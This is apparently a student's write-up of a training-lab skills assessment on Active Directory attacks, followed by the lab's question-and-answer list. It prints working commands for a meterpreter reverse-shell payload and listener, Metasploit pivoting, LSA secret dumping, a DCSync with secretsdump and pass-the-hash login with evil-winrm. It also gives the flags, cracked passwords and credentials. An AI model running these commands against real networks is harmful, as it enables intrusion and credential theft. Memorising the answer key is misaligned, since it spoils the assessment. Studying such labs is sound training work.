AD Enumeration & Attacks - Skills Assessment Part I

The Scenario

A team member started an External Penetration Test and was moved to another urgent project before they could finish. The team member was able to find and exploit a file upload vulnerability after performing recon of the externally-facing web server. Before switching projects, our teammate left a password-protected web shell (with the credentials: admin:My_W3bsH3ll_P@ssw0rd!) in place for us to start from in the /uploads directory. As part of this assessment, our client, Inlanefreight, has authorized us to see how far we can take our foothold and is interested to see what types of high-risk issues exist within the AD environment. Leverage the web shell to gain an initial foothold in the internal network. Enumerate the Active Directory environment looking for flaws and misconfigurations to move laterally and ultimately achieve domain compromise.

Apply what you learned in this module to compromise the domain and answer the questions below to complete part I of the skills assessment.

Write Up

We first start by logging into the webshell provided, once in we proceed to download the file C:\Windows\Users\Administrator\Desktop\flag.txt

Next, we enumerate all the SPNs and dump all available tickets with setspn.exe -Q */*

I then tried to upload Mimikatz, which worked fine but when I came to run it the webshell hung

The solution was to create a more stable reverse shell from my attacking host.

First thing is to upload a msfvenom payload then ran it on the webshell while on my attack host I opened msfconsole and connected to the payload and thus had a reverse shell

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<IP> -f exe -o backupscript.exe LPORT=8080

use exploit/muti/handler
set payload windows/x64/meterpreter/reverse_https
set lhost IP
set lport 8080
run

Now we can run Mimikatz and dump the hashes

We then prepare the hash and feed it into hashcat, we get a hit lucky7

We can now connect to the host MS01 with Enter-PSSession and once in we can dump the flag on the administrator account

Our next job is to find a cleartext password on the new domain. We will need to create a pivot to do this

run autoroute -s 172.16.6.0/24

use auxiliary/server/socks_proxy
run

We can use Metasploit's auto route and socks proxy for this, make sure to add we check our proxychain.conf file has been set correctly with the following line for socks4/socks5

socks4 127.0.0.1 9050
socks5 127.0.0.1 1080

Now we can netxec (formally crackmapexec) and dump the users and hashes for the LSA

sudo proxychains netexec smb 172.16.6.50 -u svc_sql -p lucky7 --lsa

We can see from the output we now have a username and in this case a cleartext password!

We can now see from scans that the user tpetty has ability to perform a DCSync attack so we can abuse this gain access to the next Domain

proxychains secretsdump.py INLANEFREIGHT/tpetty@172.16.6.3 -just-dc-user administrator

This dumped the administrator hash

We can now use this hash to perform a PTH attack with any chosen tool, I decided to go for evil-winrm

evil-winrm -i 172.16.6.3 -u administrator -H aad3b435b51404eeaad3b435b51404ee:27dedb1dab4d8545c6e1c66fba077da0

With a shell on the system, we can go ahead and complete our last task and dump the flag!

-----

Questions

Submit the contents of the flag.txt file on the administrator Desktop of the web server

JusT_g3tt1ng_st@rt3d!

Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer

svc_sql

Crack the account's password. Submit the cleartext value.

lucky7

Submit the contents of the flag.txt file on the Administrator desktop on MS01

spn$_r0ast1ng_on_@n_0p3n_f1re

Find cleartext credentials for another domain user. Submit the username as your answer.

tpetty

Submit this user's cleartext password.

Sup3rS3cur3D0m@inU2eR

What attack can this user perform?

DCSync

Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01

r3plicat1on_m@st3r!